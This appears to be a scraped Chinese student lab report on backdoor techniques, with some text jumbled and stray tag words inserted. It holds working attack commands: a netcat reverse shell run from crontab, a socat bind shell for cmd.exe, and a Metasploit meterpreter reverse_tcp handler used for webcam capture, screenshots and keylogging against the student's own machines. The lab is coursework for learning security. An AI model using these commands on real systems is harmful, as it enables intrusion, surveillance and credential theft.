返回目錄html
問題一:運行可執行文件時在已關防火牆的狀態下被Windows當成木馬攔截:拒絕訪問。
linux
解決一:除了控制面板裏關掉防火牆,win10裏內置的Windows Defender也要關閉,當時沒有發現還有這個...若是依然拒絕訪問的話,能夠添加排除項...在屢次嘗試失敗後,還能夠右鍵可執行文件->屬性->安全->編輯權限。從新生成和傳送後就能夠運行了~
web
問題二:報錯Cannot allocate memory
。
shell
解決二:這個報錯的直譯是:沒法分配內存。我想到了是由於內存不足,因此設置虛擬機的內存爲4G(要分配的比原先大),解決問題。vim
跟着老師的實驗指導和學姐學長們的經驗博客,完成本次實驗其實很容易。此次實驗幫助我掌握了後門的原理,也讓我在一次次利用後門的攻擊中有了更直觀的感覺(可能還有一絲絲成功攻擊了本身主機的興奮...??)。從此必定要加強安全防範意識,按期查殺,以避免本身的隱私和電腦控制權落入他人之手。windows
返回目錄安全
ipconfig
ifconfig -a(顯示所有接口信息)
ncat.exe -l -p 5309
監聽5309端口在Linux環境下,用crontab -e
指令編輯定時任務,選擇基本的vim編輯器("3")
網絡
08 * * * * /bin/netcat 10.43.34.219 5309 -e /bin/sh
(這裏的IP地址爲Win攻擊機的IP)並 :wq!
保存退出。在8分以前,Win裏輸入指令,屏幕上沒有反應,當8分時,Win就得到了Linux的shell,指令的內容則顯示了出來:
tcp
tcp-listen:5309 exec:cmd.exe,pty,stderr
,把cmd.exe綁定到端口5309,同時將stderr重定向到stdout上:win+L
鎖定計算機,建立的任務就開始運行了。socat - tcp:172.30.1.13:5309
,發現成功得到了Win的cmd shell:msfconsole
指令進入msf控制檯。use exploit/multi/handler
使用監聽模塊,設置payload。set payload windows/meterpreter/reverse_tcp
使用和生成後門程序時相同的payload,而後設置IP和端口號:webcam_snap
獲取目標主機攝像頭:screenshot
獲取目標主機的截屏:getuid
查看當前目標主機用戶:keyscan_start
記錄擊鍵的過程,使用keyscan_dump
讀取擊鍵記錄:返回目錄編輯器